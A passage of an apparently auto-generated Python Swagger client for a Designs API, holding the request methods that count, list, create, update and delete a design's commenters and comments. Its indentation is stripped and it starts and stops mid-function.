# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_count_get`")
collection_formats = {}
resource_path = '/Designs/{id}/commenters/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_commenters_delete(self, id, **kwargs):
"""
Deletes all commenters of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_commenters_delete_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_commenters_delete_with_http_info(id, **kwargs)
return data
def designs_id_commenters_delete_with_http_info(self, id, **kwargs):
"""
Deletes all commenters of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_commenters_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/commenters'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_commenters_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for commenters.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_commenters_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_commenters_fk_delete_with_http_info(id, fk, **kwargs)
return data
def designs_id_commenters_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for commenters.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_commenters_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/commenters/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_commenters_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for commenters.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_commenters_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_commenters_fk_get_with_http_info(id, fk, **kwargs)
return data
def designs_id_commenters_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for commenters.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_commenters_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_fk_get`")
collection_formats = {}
resource_path = '/Designs/{id}/commenters/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_commenters_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for commenters.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:param TeamMember data:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_commenters_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_commenters_fk_put_with_http_info(id, fk, **kwargs)
return data
def designs_id_commenters_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for commenters.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:param TeamMember data:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_commenters_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/commenters/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_commenters_get(self, id, **kwargs):
"""
Queries commenters of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[TeamMember]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_commenters_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_commenters_get_with_http_info(id, **kwargs)
return data
def designs_id_commenters_get_with_http_info(self, id, **kwargs):
"""
Queries commenters of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[TeamMember]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_commenters_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_get`")
collection_formats = {}
resource_path = '/Designs/{id}/commenters'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TeamMember]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_commenters_post(self, id, **kwargs):
"""
Creates a new instance in commenters of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param TeamMember data:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_commenters_post_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_commenters_post_with_http_info(id, **kwargs)
return data
def designs_id_commenters_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in commenters of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param TeamMember data:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_commenters_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_post`")
collection_formats = {}
resource_path = '/Designs/{id}/commenters'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_commenters_rel_fk_delete(self, id, fk, **kwargs):
"""
Remove the commenters relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_rel_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_commenters_rel_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_commenters_rel_fk_delete_with_http_info(id, fk, **kwargs)
return data
def designs_id_commenters_rel_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Remove the commenters relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_rel_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_commenters_rel_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_rel_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_rel_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/commenters/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_commenters_rel_fk_head(self, id, fk, **kwargs):
"""
Check the existence of commenters relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_rel_fk_head(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_commenters_rel_fk_head_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_commenters_rel_fk_head_with_http_info(id, fk, **kwargs)
return data
def designs_id_commenters_rel_fk_head_with_http_info(self, id, fk, **kwargs):
"""
Check the existence of commenters relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_rel_fk_head_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_commenters_rel_fk_head" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_rel_fk_head`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_rel_fk_head`")
collection_formats = {}
resource_path = '/Designs/{id}/commenters/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_commenters_rel_fk_put(self, id, fk, **kwargs):
"""
Add a related item by id for commenters.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_rel_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:param DesignComment data:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_commenters_rel_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_commenters_rel_fk_put_with_http_info(id, fk, **kwargs)
return data
def designs_id_commenters_rel_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Add a related item by id for commenters.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_rel_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for commenters (required)
:param DesignComment data:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_commenters_rel_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_rel_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_rel_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/commenters/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignComment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_count_get(self, id, **kwargs):
"""
Counts comments of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_count_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_comments_count_get_with_http_info(id, **kwargs)
return data
def designs_id_comments_count_get_with_http_info(self, id, **kwargs):
"""
Counts comments of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_count_get`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_delete(self, id, **kwargs):
"""
Deletes all comments of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_delete_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_comments_delete_with_http_info(id, **kwargs)
return data
def designs_id_comments_delete_with_http_info(self, id, **kwargs):
"""
Deletes all comments of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/comments'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
